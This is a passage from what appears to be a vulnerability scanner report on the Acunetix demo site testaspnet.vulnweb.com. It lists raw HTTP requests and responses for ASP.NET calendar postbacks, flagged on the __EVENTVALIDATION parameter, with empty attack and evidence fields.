leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8130&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDARzqXFtoIZGRkKgWe7vijcDIbQIYwCrqmWW7Tevw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKwicPNBQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDG5ajdlaDgDKpVniHzBItovlvBx4
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:04 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDARzqXFtoIZGRkKgWe7vijcDIbQIYwCrqmWW7Tevw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKwicPNBQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDG5ajdlaDgDKpVniHzBItovlvBx4" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:White" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8495&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCADrNoNdsIZGRkGLaF3CgB9XQU9D62iqeUYC8EMFo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKWn6qrBwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwd9QuDi9J6e8trqIsIBjnQKl%2FpLjw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:25 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCADrNoNdsIZGRkGLaF3CgB9XQU9D62iqeUYC8EMFo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKWn6qrBwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwd9QuDi9J6e8trqIsIBjnQKl/pLjw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:White" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using 